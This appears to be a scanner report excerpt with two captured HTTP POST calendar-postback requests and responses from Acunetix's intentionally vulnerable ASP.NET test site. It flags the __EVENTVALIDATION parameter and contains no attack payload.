Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1139 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,139 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8534&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDAKikOVNsIZGRkXKlggTnRuP2kiRHozW0jZQ7Tom8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKj4v5OAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb%2FeCQLmnb%2FeCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne%2FDDALmne%2FDDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ%2B5AwLmnZ%2B5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU%2FAvukpT8C%2B6TZ0wkC%2B6TZ0wkC%2B6TN9gIC%2B6TN9gIC%2B6ThjQoC%2B6ThjQoC%2B6SVoAMC%2B6SVoAMC%2B6SJxwwC%2B6SJxwwC%2B6T9rAkC%2B6T9rAkC%2B6SRwwIC%2B6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu%2F%2BQ8C3Mu%2F%2BQ8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL%2B9cJAtzL%2B9cJAtzL7%2BoCAtzL7%2BoCAtzLw9MPAtzLw9MPAtzL9%2FYIAtzL9%2FYIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDePmFQvI%2Facl59UUSiIXUUcP1xSM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:31:10 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDAKikOVNsIZGRkXKlggTnRuP2kiRHozW0jZQ7Tom8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKj4v5OAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb/eCQLmnb/eCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne/DDALmne/DDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ+5AwLmnZ+5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU/AvukpT8C+6TZ0wkC+6TZ0wkC+6TN9gIC+6TN9gIC+6ThjQoC+6ThjQoC+6SVoAMC+6SVoAMC+6SJxwwC+6SJxwwC+6T9rAkC+6T9rAkC+6SRwwIC+6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu/+Q8C3Mu/+Q8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL+9cJAtzL+9cJAtzL7+oCAtzL7+oCAtzLw9MPAtzLw9MPAtzL9/YIAtzL9/YIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDePmFQvI/acl59UUSiIXUUcP1xSM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:White" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8499&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAtVyNONsIZGRkUs7aw5DmrqckyqfcbWz7JIl5U%2Bs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKJ9r%2BlCgLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdVc8wJDPWDXcFNcyDjO64O456ewQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:28:06 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAtVyNONsIZGRkUs7aw5DmrqckyqfcbWz7JIl5U+s=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKJ9r+lCgLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdVc8wJDPWDXcFNcyDjO64O456ewQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:White" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
